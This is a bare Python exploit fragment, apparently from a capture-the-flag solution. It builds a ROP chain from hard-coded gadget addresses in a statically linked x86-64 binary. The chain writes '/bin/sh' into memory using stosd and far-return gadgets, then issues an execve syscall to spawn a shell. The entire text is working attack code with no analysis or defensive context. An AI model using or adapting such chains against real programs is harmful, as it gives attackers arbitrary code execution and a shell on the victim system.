payload = p64(0x4017d3)
#0x00000000004017d3: pop rdi; ret; 
payload += p64(0x704070)+p64(0x4228b3)
# 0x00000000004228b3: pop rax; ret; 
payload += p64(0x6e69622f)+p64(0x4cdcc4)
# 0x4cdcc4: stosd dword ptr [rdi], eax ; retf
payload += p32(0x4017d3)+p32(0x33)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x704074)+p64(0x4228b3)
# 0x00000000004228b3: pop rax; ret; 
payload += p64(0x68662f)+p64(0x4cdcc4)
# 0x4cdcc4: stosd dword ptr [rdi], eax ; retf
payload += p32(0x4228b3)+p32(0x33)
# 0x00000000004228b3: pop rax; ret; 
payload += p64(0x3b)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x704070)+p64(0x4bf6b9)
# 0x00000000004bf6b9: pop rsi; ret; 
payload += p64(0x0)+p64(0x551315)
# 0x0000000000551315: pop rdx; ret; 
payload += p64(0x0)+p64(0x43809d)
# 0x000000000043809d: syscall; 
payload += b''
